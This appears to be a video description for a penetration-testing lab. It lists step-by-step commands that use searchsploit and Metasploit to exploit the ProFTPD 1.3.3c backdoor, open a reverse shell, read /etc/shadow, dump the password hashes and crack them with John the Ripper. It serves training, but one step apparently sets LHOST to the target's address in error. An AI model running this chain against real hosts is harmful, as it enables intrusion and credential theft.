Project 94 - Discovering A Version Specific Exploit Tool w/ Searchsploit & Cracking Password Hashes!

Описание: Commands Used (in the order that they appear in the video):

1. ifconfig

2. fping -a -g 192.34.189.0/24

3. nmap -sV 192.34.189.3

4. searchsploit ProFTPD

5. Find the ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)

6. service postgresql start && msfconsole

7. workspace -a HASH

8. workspace

9. db_status

10. setg RHOSTS 192.34.189.3

11. search proftpd

12. use exploit/unix/ftp/proftpd_133c_backdoor

13. show options

14. set LHOST 192.34.189.3

15. set payload payload/cmd/unix/reverse

16. exploit (will automatically put us in shell session)

17. whoami

18. ls

19. /bin/bash -i (to start bash session as root)

20. id

21. Ctrl + z to background shell session

22. sessions (to see background session)

23. sessions -u 1 (to turn session into a meterpreter session)

24. sessions

25. sessions 2 (to switch to meterpreter session)

26. sysinfo

27. getuid

28. cat /etc/shadow (to display the contents of the password file directory, $6 tells us SHA512 is being used)

29. Ctrl + z to background meterpreter session)

30. search hashdump

31. use post/linux/gather/hashdump (will gather a dump all hashed passwords in to a txt file)

32. show options

33. set SESSION 2 (to set session parameter to meterpreter session)

34. run

35. search crack_linux

36. use auxiliary/analyze/crack_linux (uses john the ripper by default)

37. show options

38. set SHA512 true (to turn on SHA512 decryption, $6 told us that our password hash is using this function)

39. run

40. Cracked password should be "password"